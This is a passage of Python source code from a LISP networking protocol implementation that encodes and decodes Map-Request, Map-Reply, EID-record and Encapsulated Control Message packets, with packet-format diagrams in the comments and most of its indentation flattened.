lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If there is telemetry data in the JSON, there is no need to convert it to
# a dictionary array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get the AFI that follows the JSON-encoded string; we are expecting an AFI
# of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) != True): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
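    #
    # The xTR-ID is carried as the last 16 bytes of the Map-Request. The two
    # methods above split the 128-bit value into 64-bit halves and run each
    # half through byte_swap_64() so it goes on the wire in network byte
    # order. For example (hypothetical value), an xtr_id of
    # 0x00112233445566778899aabbccddeeff is split into 0x0011223344556677
    # and 0x8899aabbccddeeff before the swap.
    #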
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator-set records is encrypted with the
# chacha cipher.
#
# And this is the format of an EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
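    #
    # Example of the TTL encodings handled above: a record-ttl of 1440 is in
    # minutes, so store_ttl() returns 1440 * 60 = 86400 seconds and
    # print_ttl() prints "24 hours"; a record-ttl with the high-order bit
    # set, e.g. 0x80000000 | 90, means 90 seconds.
    #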
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
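    #
    # Example of the action/flags encoding built in encode() above: for an
    # authoritative record with action ms-ack (value 2), the 16-bit field is
    # (2 << 13) | 0x1000 = 0x5000 before byte-swapping with htons().
    #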
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
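#
# Note on the length fields computed in lisp_ecm.encode() below: for an inner
# IPv4 header, self.length is the IPv4 total-length (self.udp_length plus the
# 20-byte IPv4 header), while for an inner IPv6 header it is the IPv6 payload
# length, which is just self.udp_length (8-byte UDP header plus data).
#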
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    #enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
